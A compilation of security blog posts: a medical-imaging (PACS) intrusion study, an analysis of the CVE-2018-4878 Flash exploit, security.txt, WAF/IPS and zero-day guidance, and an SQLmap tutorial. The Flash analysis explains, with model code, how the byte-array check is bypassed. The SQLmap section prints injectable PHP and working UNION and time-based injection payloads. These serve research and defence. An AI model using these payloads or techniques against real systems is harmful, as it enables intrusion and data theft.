Using vulnerability information gathered in an earlier phase of research, we launched an attack to gain access to the PACS server. Once we had access, we downloaded the image from our dummy patient and altered the metadata of the image series, changing all references of “knee” to “elbow.”

Altered metadata of the test patient image.

We then saved the picture and uploaded it to the server. Checking the records of our dummy patient, we found our changes were successful.

Changes successfully updated.

Reconstructing Body Parts

In the medical imaging world, a large array of software can investigate and visualize images in different ways, for example, in 3D. We took our collection of images, and using a demo version of 3D software, we reconstructed complete 3D models of vertebrae, pelvis, knees, etc. and, in one case, we reconstructed a partial face.

Because we firmly believe in protecting privacy, the following example—a series of images from a pelvis—comes from a demo file that accompanies the software.

An example of a series of images.

After selecting areas of interest and adjusting the levels, we generated a 3D model of the pelvis:

A 3D model of the pelvis.

The application that generated the 3D model has a feature that allowed us to export the model in several data formats to be used by other 3D drawing programs. After the export, we imported the data into a 3D drawing program and converted the file to STL, a popular format for 3D objects and printers.

In short, we began with files from open directories, transformed them into a 3D model, and printed a tangible model using a 3D printer:

Our 3D model of a pelvis.

Conclusion

When we began our investigation into the security status of medical imaging systems, we never expected we would conclude by reconstructing body parts. The amount of old software used in implementations of PACS servers and the number of vulnerabilities discovered within the software itself are concerning. We investigated relatively few open-source vendors, but it raises the question: What more could we have found if we had access to professional hardware and software?

Default accounts, cross-site scripting, or vulnerabilities in the web server could lead to access to the systems. Our research demonstrates that once inside the systems, the data and pictures can be permanently altered.

In May 2017, one report claimed that through artificial intelligence pictures could be studied to determine how long a person will live. What if criminals could obtain that information and use it for extortion?

We understand the need for quickly sharing medical data for diagnosis and treatment and for storing medical images. We advise health care organizations to be careful when sharing images on open directories for research purposes and to at least strip the PII from the image metadata.

For organizations using a PACS, ask your vendor about its security features. Employ a proper network design in which the sharing systems are properly secured. Think not only about internal security but also about the use of VPNs and two-factor authentication when connecting with external systems.

 

For more on the health care industry follow @McAfee_Labs and catch up on all threat statistics from Q4 2017 in the March Threats Report.

The post McAfee Researchers Find Poor Security Exposes Medical Data to Cybercriminals appeared first on McAfee Blogs.

How Hackers Bypassed an Adobe Flash Protection Mechanism

The number of Flash Player exploits has recently declined, due to Adobe’s introduction of various measures to strengthen Flash’s security. Occasionally, however, an exploit still arises. On January 31, Kr-Cert reported a zero-day vulnerability, identified as CVE-2018-4878, being exploited in the field. (Adobe has released an update to fix this flaw.) We analyzed this vulnerability and found that it bypassed the byte array mitigation feature that was introduced to prevent “length corruption” attacks in Flash. This post will focus on how the exploit bypasses the length checks.

 

How the Exploit Works

This exploit has been used in targeted attacks and arrives as a Microsoft Office Excel file with an embedded Flash file. On opening the Excel file, the Flash file contacts a server and requests a key. Once the key is received, the file decodes another embedded Flash file, which is the actual exploit.

The key is 100 bytes. It decodes and loads the embedded file using Loader.loadBytes():

Because the URL for the key was offline, we could not retrieve it. But the sample hash was available online on various sites. We analyzed the sample (SHA-256) 1a3269253784f76e3480e4b3de312dfee878f99045ccfd2231acb5ba57d8ed0d.

This Adobe .SWF file contained multiple ActionScript 3 files as well as two embedded files in the BinaryData section, constituting the shellcode (marked in red in the following screen):

The Exploit in Action

When launched, the exploit checks if the system is running Windows. If so, it triggers the vulnerability.

As we see in the preceding image, the exploit takes several steps:

  • It creates a MediaPlayer object
  • It initializes the drmManager property of the MediaPlayer with nugamej, an instance of a specially crafted class based on DRMOperationCompleteListener
  • The object nugamej is "freed," but the drmManager still points to the memory location nugamej previously occupied, so the next allocation of the same size lands on stale, still-referenced memory

If we take a close look at nugamej, we can see that it was created from the class Rykim, which implements the DRMOperationCompleteListener class. The Rykim class has various “uint” variables with values set as 0x1111, 0x2222, etc.:

These variables will be used later to access various addresses in the process space and other operations.

The exploit then causes an exception by calling LocalConnection().connect(), creates the new variable "katyt" of the Rykim class, which implements the DRMOperationCompleteListener class, and starts a timer whose callback is the function "cysit":

Cysit checks whether the newly allocated object’s a1 variable is 0x1111. If the value is not equal to 0x1111, then cysit stops the timer and proceeds with the exploitation.

The exploit creates another object, "kebenid," of the type "Qep," which extends the ByteArray class. The length of kebenid is set to 512 bytes. This will be modified later to build a read-write primitive that gives unrestricted access to process memory.

Byte Array Checks to Avoid Corruption

We can see the structure of the byte array from https://github.com/adobe/avmplus/blob/master/core/ByteArrayGlue.h.

We can see that the byte array class has array, capacity, and length fields. In the past we have seen attackers corrupt the length variable to read and write arbitrary memory locations. Thus there is an extra check to ensure the integrity of the byte array: a secret value is XORed with array/capacity/length and the results are saved in the variables check_array/check_capacity/check_length.

When these variables are accessed, they are XORed with the secret key and the results are compared to the values stored in check_array/check_capacity/check_length. If they match, the data is genuine; otherwise an error is thrown, as in the following image:

Bypassing the Checks

From the preceding code, we can retrieve the key with any of the following calculations, because each check value is just the field XORed with the key:

If the value of copyOnWrite is 0, then the key is simply check_copyOnWrite (0 XOR key = key).

If we look carefully, we see that the katyt and kebenid object variables point to the same memory locations. This can be confirmed if we print and compare the variables of the two objects.

Comparing the following variables with the byte array structure, as previously mentioned, we get the following:

So if we change katyt.a24 and katyt.a25, we actually change the byte array's capacity and length. Then we just need the XOR key to write matching check values, and we can set any length we want.

Thus in this exploit the key is found using the logic Array ^ check_array = key.

Once the key is available, we can modify the byte array capacity and length to 0xFFFFFFFF and update the corresponding check values with the key, thus bypassing the byte array mitigation, and we can read or write anywhere in the process space:
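To make the reasoning above concrete, here is an added model of the check and of the bypass (written for this page; it is not avmplus code, and the field layout, the 32-bit secret and the address values are stand-ins chosen for the example). What it demonstrates is that the check copies are stored next to the fields they protect, so an attacker who can read the object, as the type-confused Rykim object allows here, recovers the secret with one XOR and can then write consistent fake values; only the pre-mitigation style of attack, overwriting length alone, is caught.

```python
MASK = 0xFFFFFFFF
SECRET = 0x5A3C9E71   # stands in for the per-process secret; an arbitrary constant for this example


class GuardedByteArray:
    """Model of the ByteArray buffer fields and their XOR 'check' copies.
    The secret lives only in _secret, which verify() uses and the exploit never
    reads directly; everything else is plain object memory."""

    def __init__(self, array_addr, capacity, length, secret=SECRET):
        self._secret = secret
        self.array = array_addr
        self.capacity = capacity
        self.length = length
        self.copy_on_write = 0
        self.check_array = array_addr ^ secret
        self.check_capacity = capacity ^ secret
        self.check_length = length ^ secret
        self.check_copy_on_write = 0 ^ secret

    def verify(self):
        """The integrity check: every field XOR secret must equal its check copy."""
        return (self.array ^ self._secret == self.check_array
                and self.capacity ^ self._secret == self.check_capacity
                and self.length ^ self._secret == self.check_length
                and self.copy_on_write ^ self._secret == self.check_copy_on_write)

    def address_of(self, index):
        """Bounds-checked access: returns the address a read at `index` would touch."""
        if not self.verify():
            raise RuntimeError("ByteArray corruption detected")
        if index >= self.length:
            raise IndexError("index beyond length")
        return (self.array + index) & MASK


def old_style_corruption(ba, new_length):
    """Pre-mitigation attack: overwrite length only. check_length no longer matches."""
    ba.length = new_length


def recover_key(ba):
    """Derive the secret from fields the confused object exposes. Both routes the
    post describes give the same value: array ^ check_array, or check_copyOnWrite
    directly when copyOnWrite is 0."""
    from_array = ba.array ^ ba.check_array
    if ba.copy_on_write == 0 and ba.check_copy_on_write != from_array:
        raise RuntimeError("inconsistent object: the two derivations disagree")
    return from_array


def forge_length(ba, new_length):
    """The bypass: set capacity/length and rewrite their check copies with the key."""
    key = recover_key(ba)
    ba.capacity = new_length
    ba.length = new_length
    ba.check_capacity = new_length ^ key
    ba.check_length = new_length ^ key
    return key
```

Any integrity scheme whose secret (or a trivially invertible function of it) sits inside the attacker-readable object gives no protection once there is an object-relative read; that is the design weakness the exploit leans on.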

Code Execution

The exploit uses the preceding read-write primitive, gained through the byte array object, to read memory and search for kernel32.dll and functions such as VirtualProtect and CreateProcessA. Once the addresses of these functions are located, shellcode can be executed on the system. This technique is very well documented online. The following screen shot shows the code responsible for searching kernel32.dll and later locating the VirtualProtect API address, 0x75ff2c15:

The exploit later executes the shellcode and connects to a URL:

It also launches cmd.exe using CreateProcessA:

The shellcode also checks for some antimalware products:

Conclusion

Attackers constantly search for ways to bypass new protection mechanisms. This exploit shows one such way. As always, we advise readers to be careful when opening unknown attachments and documents received in email.

McAfee Network Security Platform customers are protected from this vulnerability through signature ID: 0x45223900.

 

Hash

SHA-256: 1a3269253784f76e3480e4b3de312dfee878f99045ccfd2231acb5ba57d8ed0d

URLs

  • hxxp://www.korea-tax.info/main/local.php
  • hxxp://www.1588-2040.co.kr/conf/product_old.jpg
  • hxxp://1588-2040.co.kr/conf/product.jpg

 

The post How Hackers Bypassed an Adobe Flash Protection Mechanism appeared first on McAfee Blogs.

Implement “security.txt” to advocate responsible vuln. disclosures


After discussing the CAA record in DNS to whitelist your certificate authorities in my previous article, do you know it's only a matter of time before someone finds an issue with your web presence, website or any front-facing application? If they do, what do you expect them to do? Keep it under wraps, or disclose it to you "responsibly"? This article is for you if you advocate responsible disclosure; otherwise, you have some catching up with reality to do (I shall come back to you later!). Now, while we are on responsible disclosure, the "well-behaved" hackers or security researchers can either reach you via bug-bounty channels, your info@example email (not recommended) or social media, or they will struggle to find a secure channel. But what if you had a way to broadcast your "security channel" details to ease their communication, and provide them with a well-documented, managed and thought-out conversation channel? Isn't that cool? Voilà: what robots.txt is to search engines, security.txt is to security researchers!

I know you might be thinking, "...what if I have a page on my website which lists the security contacts?" But where would you host this page: under contact-us, security, information, about-us etc.? This is the very issue that security.txt evangelists are trying to solve: standardize the file, its path and its presence, using the well-known URI scheme of RFC 5785. As per their website,

Security.txt defines a standard to help organizations define the process for security researchers to disclose security vulnerabilities securely.

The project is still in its early stages[1], but is already receiving positive feedback from the security community, and big tech players like Google[2] have adopted it as well. In my opinion, it clearly signals that you take security seriously and are ready to have an open conversation with the security community if they want to report a finding, vulnerability or security issue with your website or application. By all means, it sends a positive message!

Semantics/format of "security.txt"

As security.txt follows a standard, here are some points to consider:

  • The file security.txt has to be placed in the .well-known directory at the root of your domain, i.e. example.com/.well-known/security.txt
  • It documents the following fields:
    • Comments: The file can carry optional information in comments. Comments begin with a # symbol.
    • Each field is defined on its own line.
    • Contact: This field can be an email address, a phone number or a link to a page where a security researcher can contact you. This field is mandatory and MUST be present in the file. Email, phone and web addresses are written as URIs per RFC 3986[3] (mailto:, tel: and https://; web links MUST be served over HTTPS). Possible examples are:
      Contact: mailto:security@example.com
      Contact: tel:+1-201-555-0123
      Contact: https://example.com/security-contact.html
    • Encryption: This directive should link to your encryption key if you expect the researcher to encrypt the communication. It MUST NOT be the key itself, but a URI to the key file.
    • Signature: If you want to show the file's integrity, you can use this directive to link to a signature of the file. The signature file must be named security.txt.sig and accessible at the /.well-known/ path.
    • Policy: You can use this directive to link to your security policy.
    • Acknowledgement: This directive can be used to acknowledge previous researchers and findings. It should contain company and individual names.
    • Hiring: Want to hire people? Then this is the place to post.

A reference security.txt extracted from Google,

Contact: https://g.co/vulnz
Contact: mailto:security@google.com
Encryption: https://services.google.com/corporate/publickey.txt
Acknowledgement: https://bughunter.withgoogle.com/
Policy: https://g.co/vrp
Hiring: https://g.co/SecurityPrivacyEngJobs
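As an added example (not part of the original post or of the security.txt project), the following parser and validator apply the rules listed above to a file body: comments and blank lines are ignored, Contact is mandatory, Contact values must be mailto:, tel: or https:// URIs, and the link-style fields must be https:// URIs rather than inline content. The Google file quoted above is embedded as one input; the second input is a constructed counter-example. What the code cannot check offline is the other half of the rule set: that the file is actually served at /.well-known/security.txt over HTTPS.

```python
import re
from urllib.parse import urlparse

KNOWN_FIELDS = {"contact", "encryption", "signature", "policy", "acknowledgement", "hiring"}
HTTPS_ONLY_FIELDS = {"encryption", "signature", "policy", "acknowledgement", "hiring"}
MAILTO_RE = re.compile(r"mailto:[^@\s]+@[^@\s]+\.[^@\s]+")
TEL_RE = re.compile(r"tel:\+?[0-9().-]+")


def parse_security_txt(text):
    """Split a security.txt body into (fields, errors). fields maps the lowercased
    field name to a list of values, so repeated Contact lines are all kept."""
    fields, errors = {}, []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                                  # blank lines and comments are ignored
        name, sep, value = line.partition(":")        # first colon only: values contain colons
        if not sep or not value.strip():
            errors.append("line %d: expected 'Field: value'" % lineno)
            continue
        name, value = name.strip().lower(), value.strip()
        if name not in KNOWN_FIELDS:
            errors.append("line %d: unknown field %r" % (lineno, name))
            continue
        fields.setdefault(name, []).append(value)
    return fields, errors


def is_https_uri(value):
    parsed = urlparse(value)
    return parsed.scheme == "https" and bool(parsed.netloc)


def validate_security_txt(text):
    """Return a list of problems; an empty list means the body follows the rules above."""
    fields, errors = parse_security_txt(text)
    contacts = fields.get("contact", [])
    if not contacts:
        errors.append("Contact is mandatory")
    for contact in contacts:
        if contact.startswith("mailto:"):
            if not MAILTO_RE.fullmatch(contact):
                errors.append("Contact %r is not a valid mailto: URI" % contact)
        elif contact.startswith("tel:"):
            if not TEL_RE.fullmatch(contact):
                errors.append("Contact %r is not a valid tel: URI" % contact)
        elif not is_https_uri(contact):
            errors.append("Contact %r must be mailto:, tel: or an https:// URI" % contact)
    for name in HTTPS_ONLY_FIELDS:
        for value in fields.get(name, []):
            if value.startswith("-----BEGIN"):        # someone pasted the key or signature itself
                errors.append("%s must link to a file, not contain the key or signature"
                              % name.capitalize())
            elif not is_https_uri(value):
                errors.append("%s %r must be an https:// URI" % (name.capitalize(), value))
    return errors


# Google's published file, as quoted above.
GOOGLE_SECURITY_TXT = """\
Contact: https://g.co/vulnz
Contact: mailto:security@google.com
Encryption: https://services.google.com/corporate/publickey.txt
Acknowledgement: https://bughunter.withgoogle.com/
Policy: https://g.co/vrp
Hiring: https://g.co/SecurityPrivacyEngJobs
"""

# A constructed counter-example with the mistakes the rules above rule out.
BAD_SECURITY_TXT = """\
# security contact for example.com (constructed)
Contact: http://example.com/security
Encryption: -----BEGIN PGP PUBLIC KEY BLOCK-----
Hirring: https://example.com/jobs
"""
```

Field names are matched case-insensitively and the first colon separates name from value, so a `Contact: mailto:...` line parses correctly; a typo in a field name is reported rather than silently dropped, which matters because a misspelled Contact would otherwise pass as "no contact given".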

Hope this article gives you an idea of how to implement a security.txt file, and why it matters.

Stay safe!


  1. Early drafted posted for RFC review: https://tools.ietf.org/html/draft-foudil-securitytxt-03 ↩︎

  2. Google security.txt file: https://www.google.com/.well-known/security.txt ↩︎

  3. Uniform Resource Identifier: https://tools.ietf.org/html/rfc3986 ↩︎

Attacks Leveraging Adobe Zero-Day (CVE-2018-4878) – Threat Attribution, Attack Scenario and Recommendations

On Jan. 31, KISA (KrCERT) published an advisory about an Adobe Flash zero-day vulnerability (CVE-2018-4878) being exploited in the wild. On Feb. 1, Adobe issued an advisory confirming the vulnerability exists in Adobe Flash Player 28.0.0.137 and earlier versions, and that successful exploitation could potentially allow an attacker to take control of the affected system.

FireEye began investigating the vulnerability following the release of the initial advisory from KISA.

Threat Attribution

We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper. We have observed TEMP.Reaper operators directly interacting with their command and control infrastructure from IP addresses assigned to the STAR-KP network in Pyongyang. The STAR-KP network is operated as a joint venture between the North Korean Government's Post and Telecommunications Corporation and Thailand-based Loxley Pacific. Historically, the majority of their targeting has been focused on the South Korean government, military, and defense industrial base; however, they have expanded to other international targets in the last year. They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors.

In the past year, FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper, which we detect as RUHAPPY. While we have observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks, we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets.

Attack Scenario

Analysis of the exploit chain is ongoing, but available information points to the Flash zero-day being distributed in a malicious document or spreadsheet with an embedded SWF file. Upon opening and successful exploitation, a decryption key for an encrypted embedded payload would be downloaded from compromised third party websites hosted in South Korea. Preliminary analysis indicates that the vulnerability was likely used to distribute the previously observed DOGCALL malware to South Korean victims.

Recommendations

Adobe stated that it plans to release a fix for this issue the week of Feb. 5, 2018. Until then, we recommend that customers use extreme caution, especially when visiting South Korean sites, and avoid opening suspicious documents, especially Excel spreadsheets. Due to the publication of the vulnerability prior to patch availability, it is likely that additional criminal and nation state groups will attempt to exploit the vulnerability in the near term.

FireEye Solutions Detections

FireEye Email Security, Endpoint Security with Exploit Guard enabled, and Network Security products will detect the malicious document natively. Email Security and Network Security customers who have enabled the riskware feature may see additional alerts based on suspicious content embedded in malicious documents. Customers can find more information in our FireEye Customer Communities post.

WAF and IPS. Does your environment need both?


I have been in a fair amount of discussions with management on the need for a WAF and an IPS; they often confuse the two and their basic purpose. It usually comes up after a pentest or vulnerability assessment: if I can't fix this vulnerability, shall I just put an IPS or WAF in front of it to stop the intrusion/exploitation? Or sometimes they are considered the silver bullet to thwart attackers instead of fixing the bugs. So, let me tell you: this is not good!

Security products are well suited to protect from something "unknown" or something that you have "unknowingly missed". They are not a silver bullet or an excuse to keep systems and applications unpatched.

Security shouldn't be an AND/OR case. The more the merrier, but only if they have been configured properly and each product has a different role to play under the flag of defense in depth! So, while I started this article as WAF vs. IPS, it's time to understand it's WAF and IPS. The ecosystem of your production environment is evolving and so is the threat landscape; it's more complex to protect than it was 5 years ago. Attackers are running at your pace, if not faster and a step ahead. These adversaries also piggy-back on existing threats to launch their exploits. Often something that starts as simply as a DDoS to overwhelm your network ends in an application-layer attack. So network firewall, application firewall, anti-malware, IPS, SIEM etc. all have an important task and should be omnipresent with bells and whistles!

Nevertheless, whether it's a WAF or an IPS, each has its own purpose, and though they can't replace each other, they often have gray areas under which you can rest your risks. This blog will try to address these gray areas and the associated differences to make life easier when it comes to WAF (Web Application Firewall) or IPS (Intrusion Prevention System). The assumption is that both are modern products and the IPS has deep packet inspection capabilities. Now, let's try to understand the infrastructure, environment and scope of your golden eggs before we decide which is the best way to protect the data:

  1. If you are protecting only the "web applications" running over HTTP, then a WAF is enough. An IPS will be the cherry on the cake.
  2. If you are protecting all sorts of traffic (SSH, FTP, HTTP etc.), then a WAF is of less use, as it can't inspect non-HTTP traffic. I would recommend having a deep packet inspection IPS.
  3. A WAF must not be considered an alternative to a traditional network firewall. It works on the application layer and hence is primarily useful for HTTP, SSL (decryption), JavaScript, AJAX, ActiveX and session-management kinds of traffic.
  4. A typical IPS does not decrypt SSL traffic, and is therefore insufficient for packet inspection of HTTPS sessions.
  5. There is a wide difference in traffic visibility and baselining for anomalies. While a WAF has an "understanding" of the traffic (HTTP GET, POST, URL, SSL etc.), the IPS only sees network traffic and can therefore do layer 3/4 checks (bandwidth, packet size, raw protocol decoding/anomalies) but not GET/POST or session-management checks.
  6. An IPS is useful where RDP, SSH or FTP traffic has to be inspected before it reaches the box, to make sure that the protocol is not tampered with or wrapped inside another TCP stream.

Both technologies have matured and have many gray areas of operation, but understand that a WAF knows and captures the contents of HTTP traffic to see if there is SQL injection, XSS or cookie manipulation, while an IPS has very little or no understanding of the underlying application and therefore can't do much with the traffic contents. An IPS can't raise an alarm if someone is getting confidential data out, or even sending a harmful parameter to your application; it will let it through if it's a valid HTTP packet.

Now, with the information I just shared, try to have a conversation with your management on how to provide the best layered approach to security: how to make sure the network and application are resilient to complex attacks and threats lurking at your perimeter, or inside.

Be safe.

I know I haven’t patched yet, and there’s a zero-day knocking at my door


Patching is important, but let's agree it takes time. It takes time to test and validate the patch in your environment and check the application's compatibility with the software and the underlying services. And then, one fine day, an adversary hacks your server through this unpatched code while you are still testing. It breaks my heart, and I wonder "what can be done in the delta period while the team is testing the patch"? The adversary, on the other hand, is busy either reversing the patch or using a zero-day to attack the systems! I mean, once a patch is released, it's a race:

Either bad guys reverse it and release a working exploit, OR good guys test, verify and update their environment. A close game, always.

Technically, I wouldn't blame the application security team or the one managing the vulnerable server. They have their SLA to apply updates on the OS or application servers. In my experience, a high-severity patch has to be applied in 15 days, medium in 30 days, and low in 45 days. Now, if the criticality is too severe, it should be managed in 24 to 48 hours with enough testing on functionality, compatibility and test cases with the application team or server management team. Now, what to do when there is a zero-day exploit lurking in your backyard? It used to be a low-probability gamble, but now it's getting more realistic and frequent. The recent Apache Struts vulnerability has done enough damage to many big companies like Equifax. I already addressed this issue in a blog post before, along with the need for alternatives such as a WAF in a secure SDLC.

What shall I do if there's a 0-day lurking in my backyard?

Yes, I know there's a zero-day for your web application or underlying server, and you are busy patching, but what other security controls do you have in place?
Ask yourself these questions:

  1. Do I understand the zero-day exploit? Is it affecting my application, or a particular feature?
  2. Do I have a product/tool for prevention at the application layer at the network perimeter that can filter bad requests: network WAF (Web Application Firewall), network IPS (Intrusion Prevention System) etc.?
  3. Do I have a product/tool for prevention at the application layer on the host: host-based IPS, WAF etc.?
  4. Can I just take the application offline while I patch?
  5. What's the threat model and risk appetite if exploitation is successful?
  6. Can I brace for impact by lowering the interaction with other components, or by preventing it from spreading across my environment?

Let's understand how these answers will support your planning to develop a resilient environment:

>> Understanding of the zero-day exploit

You know there's an exploit in the wild, but did your security team or DevOps folks take a look at it? Did they find the exploit and understand the impact on your application? It is very important to understand what you are dealing with before you plan to secure your environment. Not all exploits are in scope for your environment, because of its limitations, frameworks, plugins etc. So do a bit of research, ask questions and work on your timelines accordingly. In the best case, you understand the pattern you have to protect your application from.

>> Prevention at the application layer for network perimeter

If you know what's coming to hit you, you can plan a strategy to block it as well. Blocking is more effective when it's at the perimeter: the earlier the better. And if you have done good research on the exploit, or the threat vector that can affect you, please take note of the pattern and find a way to block it at the perimeter while you patch the application.

>> Prevention at the application layer for host

There are times when, even though you know the pattern and the details of the exploit, the network perimeter is incapable of blocking it; for example, if SSL offload happens on the server or load balancer, the perimeter devices only ever see encrypted traffic. In this case make sure the server knows what is expected and blocks everything else, including anomalies. This can be achieved by host-based protection: an IPS or a WAF.
Even a small thing like a file integrity monitor (Tripwire, for example) can watch directories and files to make sure the attacker is not able to create files, or at least that you get the alert at the right time to react. This can make a huge difference!

Note: Make sure the IPS (network/host) is capable of in-depth packet filtering. If the pattern can be blocked on the WAF with a quick rule, do it, and make sure it doesn't generate false positives that can impact your business. Also monitor the WAF for alerts, which can tell you if there have been failed attempts by adversaries. Remember, attackers won't use their best weapon straight away; usually it starts with "information gathering", uploading files or executing known exploits before customizing the attack for their needs.

You have a very high chance of detecting adversaries while they are gathering insights about you. Keep a keen eye on any alert from the production environment.

>> Taking application offline

Is it possible to take the application offline while you patch the software? This depends on the exposure of the application, its CIA (Confidentiality, Integrity and Availability) rating and what kind of business impact assessment has been performed. If you think that taking it offline can speed up the process and reduce the exposure without hurting your business, do it. Better safe than sorry.

>> Threat model and risk appetite

You have to assess and perform threat modeling of the application. The reason it is required is that not every risk is high. Not every application needs the same attention, and the vulnerable application may well be internal, which substantially reduces the exposure and underlying impact! Do ask your team: is the application Internet-facing, how many users are using it, what kind of data is it dealing with etc., and act accordingly.

>> Brace for impact

Finally, if things still look blurry, start preparing yourself for impact. Try to minimize it by validating and restricting access to the server. You can perform some sanity checks and implement controls like:

  1. Least-privilege accounts for application use
  2. Least interaction with the rest of the production environment
  3. Restricted database requests and responses to limit data exfiltration
  4. Keep the incident management team on high alert.

Incident management: are you sure you are not already breached?

Now, what are the odds that while you are reading this blog, trying to answer all the questions and getting ready, you haven't already been compromised? Earlier, such incident statements used to begin with "What if...", but now they say "When...", so make sure all your monitoring systems are reporting anomalies and someone is monitoring them well. These tools are only good if a human being is responsibly validating the alerts. Once an alert is flagged red, a process should trigger to analyze and minimize the impact.
Read more about incident monitoring failures in my earlier blog post. Don't be one of them.

Now, once you address these questions you should have a fairly resilient environment to either mitigate or absorb the impact. Be safe!

Sql Injection using SQLmap with multipart/form-data Encoding

I’ve spent a fair amount of my time examining code for vulnerabilities, and I recently began to focus specifically on SQL injection. While investigating this specific type of vulnerability in web applications, I ran across a few examples where the injection point was in a POST request, but it wasn’t your straightforward content-type application/x-www-form-urlencoded form. The injection point was being passed as an array via POST and processed inside of a foreach loop:

$person_name = $_POST['person'];
foreach ($person_name as $person => $value) {
    // $value is interpolated straight into the SQL string: this is the injection point
    $query  = "select * from v_entry where vdbid = $value";
    $result = mysql_query($query);
    $num    = mysql_numrows($result);
    $x = 0;
    while ($num > $x) {
        echo "<br>";
        echo mysql_result($result, $x, 1);
        $x++;
    }
}


The HTML form specified the encoding type as ‘multipart/form-data’.

A packet capture with tcpdump of the original form post, followed by one of my first attempt with SQLmap, shows the differences clearly:

 # tcpdump -Xvvv port 80

POST /post_sqli_research/form.php HTTP/1.1 
 Host: example.com
 Connection: keep-alive
 Content-Length: 591
 Cache-Control: max-age=0
 Origin: http://example.com
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla...
 Referer: http://example.com/post_sqli_research/form.php
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.8

 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_name]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_contact]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_email]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_description]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person_create"
 
 Add Person

And the tcpdump output with a generic attempt using SQLmap:

 
 POST /post_sqli_research/form.php HTTP/1.1
 Content-Length: 135
 Accept-Language: en-us,en;q=0.5
 Accept-Encoding: gzip,deflate
 Host: example.com
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 User-Agent: sqlmap/1.0.8.2#dev (http://sqlmap.org)
 Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
 Connection: close
 Pragma: no-cache
 Cache-Control: no-cache,no-store
 Content-Type: application/x-www-form-urlencoded; charset=utf-8
 
 Person%5BPerson_name%5D=%20UNION%20ALL%20SELECT%20NULL%23&Person%5BPerson_contact%5D=1&Person%5BPerson_email%5D=1&Person%5Bdescription%5D=1%22[!http]

We see the Content-Type encoding isn’t what the form is expecting. I’ll clean up and modify the tcpdump output to add a ‘*’ where we think the injection point is. I’ll then save it in a file called request.txt and supply that as the argument to -r REQUESTFILE in SQLmap. It should look similar to the output below:

$ cat request.txt
 
 POST /post_sqli_research/test.php HTTP/1.1
 Host: example.com
 Connection: keep-alive
 Content-Length: 591
 Cache-Control: max-age=0
 Origin: http://example.com
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla...
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
 Referer: http://example.com/post_sqli_research/form.php
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.8
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_name]"
 1*
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_contact]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_email]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_description]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person_create"
 
 Add Person
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2--

I’ll specify the parameter with -p TESTPARAMETER on the SQLmap command line; it is the one where we placed a ‘*’ in the request file to mark our suspected injection point. As mentioned above, -r tells SQLmap to use the request in that file as the template for the requests it generates.

 $ sqlmap  -r request.txt -p "Person[Person_name]" --level 2 --risk 2
 .
 .
 .
 
 [11:40:13] [INFO] (custom) POST parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
 (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
 sqlmap identified the following injection point(s) with a total of 373 HTTP(s) requests:
 
 ---
 
 Parameter: #1* ((custom) POST)
 
 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
 Payload: ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_name]"
 1 AND (SELECT * FROM (SELECT(SLEEP(5)))GrGB)
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_contact]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_email]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_description]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person_create"
 Add Person
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2--
     Type: UNION query
 
     Title: Generic UNION query (NULL) - 19 columns
 
     Payload: ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_name]"
 1 UNION ALL SELECT NULL,CONCAT(0x7170787671,0x534c744f4a7043446e4c6c55596b634b61624c6d55686e546272756b736a4e6973544979686c746c,0x7162706a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- kVed
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_contact]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_email]"
 1
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 Content-Disposition: form-data; name="Person[Person_description]"
 1
